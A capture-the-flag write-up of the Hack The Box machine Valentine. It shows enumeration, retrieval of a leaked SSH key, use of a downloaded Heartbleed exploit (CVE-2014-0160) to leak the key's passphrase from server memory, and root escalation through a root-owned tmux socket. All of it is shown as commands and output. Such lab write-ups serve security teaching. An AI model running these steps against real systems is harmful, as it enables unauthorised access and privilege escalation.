Valentine Writeup
Introduction :
Valentine is an easy Linux box that was released back in Febuary 2018. It features a popular CVE called Heartbleed.
Part 1 : Initial Enumeration
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 18:09 CET
Nmap scan report for 10.10.10.79
Host is up (0.046s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2019-11-20T17:09:42+00:00; +10s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 9s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
λ nihilist [ 10.10.14.48/23 ] [~] → sslscan 10.10.10.79
_
___ ___| |___ ___ __ _ _ __
/ __/ __| / __|/ __/ _ | _ \
\__ \__ \ \__ \ (_| (_| | | | |
|___/___/_|___/\___\__,_|_| |_|
sslscan version 1.10.2
OpenSSL 1.0.2t 10 Sep 2019
Testing SSL server 10.10.10.79 on port 443
Preferred Server Cipher(s):
TLSv1 256 bits ECDHE-RSA-AES256-SHA
TLS11 256 bits ECDHE-RSA-AES256-SHA
TLS12 256 bits ECDHE-RSA-AES256-GCM-SHA384
SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50aW5lLmh0YjEWMBQG
A1UEAwwNdmFsZW50aW5lLmh0YjAeFw0xODAyMDYwMDQ1MjVaFw0xOTAyMDYwMDQ1
MjVaMEoxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50
aW5lLmh0YjEWMBQGA1UEAwwNdmFsZW50aW5lLmh0YjCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAMMoF6z4GSpB0oo/znkcGfT7SPrTLzNrb8ic+aO/GWao
oY35ImIO4Z5FUB9ZL6y6lc+vI6pUyWRADyWoxd3LxByHDNJzEi53ds+JSPs5SuH1
PUDDtZqCaPaNjLJNP08DCcC6rXRdU2SwV2pEDx+39vsFiK6ywcrepvvFZndGKXVg
0K+R3VkwOguPhSHlXcgiHFbqei8NJ1zip9YuVUYXhyLVG2ZiJYX6CRw4bRsUnql6
4DFNQybOsJHm0JtI2M9PefmvEkTUZeT/d0dWhU076a3bTestKZf4WpqZw60XGmxz
pAQf5dWOqMemIK6K4FC48bLSSN59s4kNtuhtx6OCXpcCAwEAAaNQME4wHQYDVR0O
BBYEFNzWWyJscuATyFWyfLR2Yev1T435MB8GA1UdIwQYMBaAFNzWWyJscuATyFWy
fLR2Yev1T435MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBACc3NjB7
cHUXjTxwdeFxkY0EFYPPy3EiHftGVLpiczrEQ7NiHTLGQ6apvxdlShBBhKWRaU+N
XGhsDkvBLUWJ3DSWwWM4pG9qmWPT241OCaaiIkVT4KcjRIc+x+91GWYNQvvdnFLO
5CfrRGkFHwJT1E6vGXJejx6nhTmis88ByQ9g9D2NgcHENfQPAW1by7ONkqiXtV3S
q56X7q0yLQdSTe63dEzK8eSTN1KWUXDoNRfAYfHttJqKg2OUqUDVWkNzmUiIe4sP
csAwIHShdX+Jd8E5oty5C07FJrzVtW+Yf4h8UHKLuJ4E8BYbkxkc5vDcXnKByeJa
gRSFfyZx/VqBh9c=
-----END CERTIFICATE-----
Version: 2
Serial Number: 85:ec:6d:f5:c5:84:b1:f2
Signature Algorithm: sha1WithRSAEncryption
Issuer: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
Not valid before: Feb 6 00:45:25 2018 GMT
Not valid after: Feb 6 00:45:25 2019 GMT
Subject: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
Public Key Algorithm: rsaEncryption
RSA Public Key: (2048 bit)
Public-Key: (2048 bit)
Modulus:
00:c3:28:17:ac:f8:19:2a:41:d2:8a:3f:ce:79:1c:
19:f4:fb:48:fa:d3:2f:33:6b:6f:c8:9c:f9:a3:bf:
19:66:a8:a1:8d:f9:22:62:0e:e1:9e:45:50:1f:59:
2f:ac:ba:95:cf:af:23:aa:54:c9:64:40:0f:25:a8:
c5:dd:cb:c4:1c:87:0c:d2:73:12:2e:77:76:cf:89:
48:fb:39:4a:e1:f5:3d:40:c3:b5:9a:82:68:f6:8d:
8c:b2:4d:3f:4f:03:09:c0:ba:ad:74:5d:53:64:b0:
57:6a:44:0f:1f:b7:f6:fb:05:88:ae:b2:c1:ca:de:
a6:fb:c5:66:77:46:29:75:60:d0:af:91:dd:59:30:
3a:0b:8f:85:21:e5:5d:c8:22:1c:56:ea:7a:2f:0d:
27:5c:e2:a7:d6:2e:55:46:17:87:22:d5:1b:66:62:
25:85:fa:09:1c:38:6d:1b:14:9e:a9:7a:e0:31:4d:
43:26:ce:b0:91:e6:d0:9b:48:d8:cf:4f:79:f9:af:
12:44:d4:65:e4:ff:77:47:56:85:4d:3b:e9:ad:db:
4d:eb:2d:29:97:f8:5a:9a:99:c3:ad:17:1a:6c:73:
a4:04:1f:e5:d5:8e:a8:c7:a6:20:ae:8a:e0:50:b8:
f1:b2:d2:48:de:7d:b3:89:0d:b6:e8:6d:c7:a3:82:
5e:97
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
X509v3 Authority Key Identifier:
keyid:DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
X509v3 Basic Constraints:
CA:TRUE
Verify Certificate:
self signed certificate
Part 2 : Getting User Access
Port 80 seems to be running Apache 2.2.22, let's run the dirbuster command to try and find out what are the directories we can find.
λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.79/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 20 18:14:59 2019
URL_BASE: http://10.10.10.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.79/ ----
+ http://10.10.10.79/cgi-bin/ (CODE:403|SIZE:287)
+ http://10.10.10.79/decode (CODE:200|SIZE:552)
==> DIRECTORY: http://10.10.10.79/dev/
+ http://10.10.10.79/encode (CODE:200|SIZE:554)
+ http://10.10.10.79/index (CODE:200|SIZE:38)
+ http://10.10.10.79/index.php (CODE:200|SIZE:38)
+ http://10.10.10.79/server-status (CODE:403|SIZE:292)
---- Entering directory: http://10.10.10.79/dev/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Nov 20 18:18:00 2019
DOWNLOADED: 4612 - FOUND: 6
According to dirb, /dev seems to be listable. Let's fire up a web browser to check it.
λ nihilist [ 10.10.14.48/23 ] [~] → lynx http://10.10.10.79/
We seem to have found a key however it seems to be hexadecimal-encoded. We will first use the curl command with the -s and -k flags to download the encoded key. Then we will use the xxd command with the -r and -p flags to convert the key from hexadecimal to it's original ascii charcaters.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk http://10.10.10.79/dev/hype_key > hype_key
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p > Hype.ssh.key
Now we have decrypted the hype ssh key and saved it locally as "Hype.ssh.key" As a side note, the header of the ssh key says "Proc-Type" and "DEK-Info" which means that we will probably need a passphrase for the key. When we open the browser at the URL http://10.10.10.79/ we are greeted with an image that is an analogy to the Heartbleed Vulnerability. Let's test if this machine is vulnerable to the well-known Heartbleed vulnerability (CVE-2014-0160). To do so we will first off download the according python script heartbleed.py and check how to use it.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py > heartbleed.py
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → nano heartbleed.py
We will run the command using python2 and with the -n flag in order to increase our attempts at getting information from the machine.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → python2 heartbleed.py 10.10.10.79 -n 201
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.10.10.79:443, 201 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 201 of 201
##################################################################
).(B...}.@....SC[...r....+..H...9...BlCg==
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=**aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==**
Looking at the results we see that it seems to have returned us a base64-encoded string. We will use the base64 command with the -d flag to decode the encoded string.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype
Now we will try to log onto the box through the ssh service using our decrypted Hype.ssh.key along with the passphrase "heartbleedbelievethehype"
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
The authenticity of host '10.10.10.79 (10.10.10.79)' cant be established.
ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'Hype.ssh.key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "Hype.ssh.key": bad permissions
Let's not forget to change the permissions of the SSH key to 600 (read+write for root and nothing for groups + user)
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
Enter passphrase for key 'Hype.ssh.key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ uname -a
Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
hype@Valentine:~$ cat /home/hype/Desktop/user.txt
e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
We have been able to print out the flag user, the combination of the SSH key and it's passphrase gave us access to the machine, which logged us as the "hype" user.
Part 3 : Getting Root Access
In order to escalate privileges we will first have to take a look at what we can work with, starting with the .bash_history file.
hype@Valentine:~$ cat .bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
seems like the user hype was working with something within a hidden devs directory. Just like in the .bash_history file we will use the ls command with the -a flag in order to list the hidden files and then navigate our way in.
hype@Valentine:~$ cd /
hype@Valentine:/$ ls -la
total 108
drwxr-xr-x 26 root root 4096 Feb 6 2018 .
drwxr-xr-x 26 root root 4096 Feb 6 2018 ..
drwxr-xr-x 2 root root 4096 Dec 11 2017 bin
drwxr-xr-x 3 root root 4096 Feb 16 2018 boot
drwxr-xr-x 2 root root 4096 Dec 11 2017 cdrom
drwxr-xr-x 13 root root 4060 Nov 20 09:07 dev
drwxr-xr-x 2 root root 4096 Dec 13 2017 devs
drwxr-xr-x 2 root hype 4096 Nov 20 09:07 .devs
drwxr-xr-x 132 root root 12288 Nov 20 09:07 etc
drwxr-xr-x 3 root root 4096 Dec 11 2017 home
lrwxrwxrwx 1 root root 32 Dec 11 2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
drwxr-xr-x 21 root root 4096 Dec 11 2017 lib
drwxr-xr-x 2 root root 4096 Apr 25 2012 lib64
drwx------ 2 root root 16384 Dec 11 2017 lost+found
drwxr-xr-x 3 root root 4096 Apr 25 2012 media
drwxr-xr-x 3 root root 4096 Dec 11 2017 mnt
drwx------ 2 root root 4096 Dec 13 2017 opt
dr-xr-xr-x 92 root root 0 Nov 20 09:07 proc
drwx------ 4 root root 4096 Feb 6 2018 root
drwxr-xr-x 20 root root 740 Nov 20 10:02 run
drwxr-xr-x 2 root root 4096 Feb 16 2018 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 Apr 25 2012 srv
drwxr-xr-x 13 root root 0 Nov 20 09:07 sys
drwxrwxrwt 5 root root 4096 Nov 20 10:08 tmp
drwxr-xr-x 10 root root 4096 Apr 25 2012 usr
drwxr-xr-x 14 root root 4096 Feb 6 2018 var
lrwxrwxrwx 1 root root 29 Dec 11 2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
hype@Valentine:/$ cd .devs
hype@Valentine:/.devs$ ls
dev_sess
let's simply reproduce the steps that hype was doing, which apparently was an attempt at attaching the socket to the dev_sess file
hype@Valentine:/.devs$ ls -l
total 0
srw-rw---- 1 root hype 0 Nov 20 09:07 dev_sess
it seems like the dev_sess file is owned by root, let's attach the tmux session ourselves, and it should give us a root shell.
hype@Valentine:/.devs$ tmux -S dev_sess
root@Valentine:/.devs# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/.devs# cat /root/root.txt
f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the root flag.
Conclusion
Here we can see the progress graph :
Nihilist
8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o
7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8 Donate XMR to Nihilist: